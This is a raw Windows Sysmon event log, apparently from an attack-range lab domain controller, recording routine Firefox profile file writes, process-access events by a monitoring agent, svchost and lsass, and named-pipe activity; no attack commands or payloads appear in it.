12:22:59.695{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=C9BFC89035B4A35DA71F270B3FCAAEA4,SHA256=8082E6857BBE3FB58E47C243F222ABBA1C201F64814FE4CF5A41EC9A71E7187C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043563Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.695{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=A2757D76CD75189298365F10643F74DB,SHA256=507188963CF4A8D57DA9D8FA912B20F18B282A7466D77B65E6797EDB1C79CFDB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043562Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.695{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=86D17D8813FF44F95347A038EBF5E061,SHA256=0ED4DE7AE5C4C2A6E65DE4C3BA899DF34A0A3917A5FD85B42E512524D4CB22E6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043561Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.695{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=1AA929C9F6072FB4D7CD409A60E1B763,SHA256=C4BCEA3D6AF221B108655794EBF73C401757AFD97A5CE30C065D05246B0615DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043560Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.695{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=374BCE980391CA74090DD1F6575E12C5,SHA256=F13AB95CCBBA18BAB97F760694615869EFD01F0261CD07434054844A0E7436B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043559Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.679{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=9C00C77FC93BE2A2B3DA08E9DBAFCB2B,SHA256=4C48251E32E04C081DA5BB500A75664BE6D39F6C9FCD399AB4075E5D596F908F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043558Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.679{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=AA15F1BDF3915C58DBFD873754DB0E72,SHA256=C23D6C40ADB36CDFD84DFFD974BE813BA8D195DE4844570454FEA7E94115F96B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043557Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.679{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=B46ECC6A8C215BA114FD2C50BF35A8FD,SHA256=26EB7177BDF642DA2CA3A64B2443A7F5C87CF85FED37C3D707680701D10FD834,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043556Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.679{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=75D7DD7E237DC32BB0774656C748815A,SHA256=B44BAF9634BF481D28B8C4E25B352CDF8116BEE9A4DFFCDF1FB5AAAA5D0E5A6F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043555Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.679{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=B2A10FE14442189E6F84AF96B1E2670C,SHA256=93819C2B6D13B64EC2B3A07DE09E18038F982FFF18C64AC709AD9A12F774FB30,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043554Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.679{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=08BEC0EF672BE3A0846622CCE27AFE9F,SHA256=79CE67314CC06AFE6935E530D8710CB3423C73D79AC0075FE2DD6CBC9FC0F7EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043553Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.679{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=A63EC999D23F0819F43026E5D409D322,SHA256=90E2CF19B0417FE2B1933201A01F3B913B51413919E65284EA45893A9DD58129,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043552Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.679{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=655D37248B9572AB8BCF03245084E1E6,SHA256=968755CFA72CBCD1D7CF0BB4E98B3E9F750BAA04D5E127FDB3B87BB606B8B1ED,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043551Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.679{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=8D0320CA81E0F2D86ED76E536ACD664B,SHA256=C3727CE9FD236652F610D786EF70B98CC7B8B938AD0EDAEBFBC7D26577CC5E7C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043550Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.679{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=0D85C198489D480FA305890A55AEF63D,SHA256=3601DDAF5A161CEBB227103CF1FA1B0CEDEF491F00C13B16F01032832BC6EBF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043549Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.679{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=4678C8968D8DF0B3BAD0859CC8907689,SHA256=A87BDC6851F299D4AA986850CB3175EB914A0620F150342B36B2F16F3F71A2CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043548Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.679{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=7B23E6A4CE7935CD33609A34CB9A02C8,SHA256=DCD2FDEF295EBFFDFD55F730B45A8126AC7175778E0C56207330FF19FFB660FE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043547Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.679{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\datareporting\glean\db\data.safe.binMD5=BFEA4C26FD7F672E889623B440EBF4F1,SHA256=5C90FCCF0129EFDFD305F994C3A0A4F2806FF7513B95B715D4024046D04C8FE7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043546Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.606{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=A06F2955FA98F8DCBCA11CD01027E547,SHA256=6B4EA464047C3F3734D0B722ADE86584EE9DB3CBFC3B6C7870F81BA983D0135D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043545Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.538{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043544Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.525{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043543Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.525{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043542Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.525{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043541Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.524{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043540Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.524{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043539Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.524{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000043538Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.506{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\prefs-1.jsMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043537Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.502{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043536Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.494{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\2752s6y5.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000043535Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.491{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F1E04EE561DAACC0493152C47E622C2,SHA256=F371FA759518F27D1AE160F321344280778F0277933FBF5944F28B157FF82537,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000043534Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.428{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043533Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.428{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043532Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.428{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000043531Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.405{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043530Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.404{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043529Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.394{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043528Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.394{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043527Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:59.390{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\LOCAL\cubeb-pipe-3240-1C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000043526Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:59.390{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\LOCAL\cubeb-pipe-3240-1C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043525Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.364{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-E4A3-63C7-4C06-00000000AF02}292C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043524Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:59.364{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko.3240.6744.12279677497399393491C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000043523Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 